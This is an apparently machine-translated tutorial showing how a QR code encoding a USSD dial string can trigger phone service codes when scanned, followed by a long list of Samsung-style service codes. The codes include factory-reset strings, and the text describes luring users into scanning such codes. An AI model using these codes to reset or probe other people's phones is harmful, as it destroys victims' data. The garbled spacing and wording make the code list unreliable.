Qr Code: Malicious USSD command attack

The Qr code was first specifically used for industrial applications and later popularized in the advertising industry.

A typical QR code can include:

* Contact information of the electronic version;

* It can contain event information, scan a poster or QR code on the app, and automatically perform location or download operations;

* Wireless Configuration data can be included;

By exploiting human curiosity and the inherent blur of QR code, coupled with the vulnerability related to Protocol call services on mobile platform devices, the QR code can become a medium for malicious attacks to users. This article describes how to use the QR code + USSD command to perform a test. To ensure the security of the reader's mobile phone data, this test shows how to obtain the IMEI code of the mobile phone.

USSD (Unstructured Supplementary Service Data) is a new type of Interactive Data Service Based on GSM network. When you enter a number or symbol (for example, * #) that has been specified in the network on the keyboard of your mobile phone, and then press send, which is the dial-up key, you can send an instruction to the network, select the services you need based on your instructions. The USSD command has many functions, allowing the mobile phone to restore factory settings and display the mobile phone system software version information.

IMEI (International Mobile Equipment Identity) is the abbreviation of International Mobile device Identity code. It is an electronic serial number consisting of 15 digits ", it corresponds to each mobile phone, and the code is the only one in the world. Each mobile phone is assigned a unique group of numbers in the world after it is assembled. This number will be recorded by the manufacturer who manufactures it from production to delivery.

This test requires a QR code scanner, android or ios Mobile phone, And a QR code generator.

Use the online QR code to generate the system http://goqr.me/. open the website and select "Callback". In the telephone Number field, enter:* #06 #(Query the mobile phone imei ussd command) you can see that a QR code is automatically generated on the right side.

By scanning with a QR code scanner, you can find information about IMEI. Some QR codes may be prompted to call after being determined by the TEL type. This is relatively safe.

After the QR code is generated, it is natural to induce users to scan through activities on the network to achieve the purpose of attacks. However, it seems that many QR code scanners will ask the user again whether to open a link or call a number.

Some android devices in some departments may not support USSD command attacks. If you call and send * #06 #, the IMEI code is not displayed, indicating that the USSD command is not supported. The USSD command has powerful functions and can be used to restore factory settings. Therefore, the USSD command attack using the QR code is still very harmful. The following is a collection of USSD commands:

Information

* #44336 # Software Version Information
* #1234 # view the software version of PDA, CSC, and MODEM
* #12580*369 # SW & HW Information
* #197328640 # Service Mode
* #06 # = IMEI number.
* #1234 # = firmware version.
* #2222 # = H/W version.
* #8999*8376263 # = all versions.
* #272 * IMEI # * product code
* #3264 # *-memory version
* #92782 # = Mobile Phone Model
* #9999 # * = telephone/PDA/CSC Information

Test

* #07 # test history
* #232339 # WLAN Test Mode
* #232331 # Bluetooth Test Mode
* #232331 # *-Bluetooth Testing
* #0842 # Vibration Motor Test Mode
* #0782 # Real-time clock test
* #0228 # ADC reading
* #32489 # (encrypted information)
* #232337 # Bluetooth address
* #0673 # audio test mode
* #0 * # General Test Mode
* #3214789650 # LBS Test Mode
* #0289 # melody Test Mode
* #0589 # optical sensor test mode
* #0588 # proximity sensor test mode
* #7353 # Quick test menu
* #8999*8378 # = test menu.
* #0588 # *-test proximity sensors
* #2664 # *-touch screen testing
* #0842 # *-vibration test *

Network

* 7465625*638 * # configure the network lock MCC/MNC
#7465625*638 * # Insert the network lock KEYCODE
* 7465625*782 * # new dry method for configuring network lock
#7465625*782 * # Insert the Partitial network Lock key code
* 7465625*77 * # Insert the network lock KEYCODE SP
#7465625*77 * # insert operation Lock key code
* 7465625*27 * # Insert the network Lock key code NSP/CP
#7465625*27 * # Insert the content provider key,
* #7465625 # view the mobile phone lock status
* #232338 # wlan mac address
* #526 # Run the WLAN test in WLAN engineering mode (the same below)
* #528 # WLAN engineering mode
* #2263 # select the RF frequency band. I don't know if this one seems to be locked.
* #301279 # HSDPA/HSUPA menu-change HSDPA class (Optional: 1-5)

Tool/miscellaneous.

* #1111 # *-Service Mode

#273283*255*663282 * # create an SD card for Data

* #4777*8665 # = GPSR tool.
* #4238378 # GCF Configuration
* #1575 # GPS control menu

* #9090 # diagnosis configuration
* #7284 # USB I2C mode control installation to USB storage/MODEM
* #872564 # USB Flood Control
* #9900 # log dump that can be used for debugging in the system dump Mode

* #34971539 # camera firmware update
* #7412365 # camera firmware menu

* #273283*255*3282 * # Data creation menu changes SMS, MMS, voice, and contact restrictions
* 2767*4387264636 # sell SMS/PCODE View
* #3282 # * 727336 * Data Usage Status
* #8255 # *-display the great information sources of GTalk Service monitors

* #3214789 # GCF mode status

* #0283 # audio loop control
#7594 # REMAP, shut down, and end the call TSK
* #272886 # automatic response selection

* ** System ***

Exercise caution

* #7780 # restore factory settings
* 2767*3855 # restore factory settings
* #7780 # * factory data Reset

* #745 # RIL dump menu
* #746 # debug the dump menu
* #9900 # system dump Mode

* #8736364 # OTA update menu
* #2663 # TSP/TSK firmware update
* #03 # S/N of nand flash memory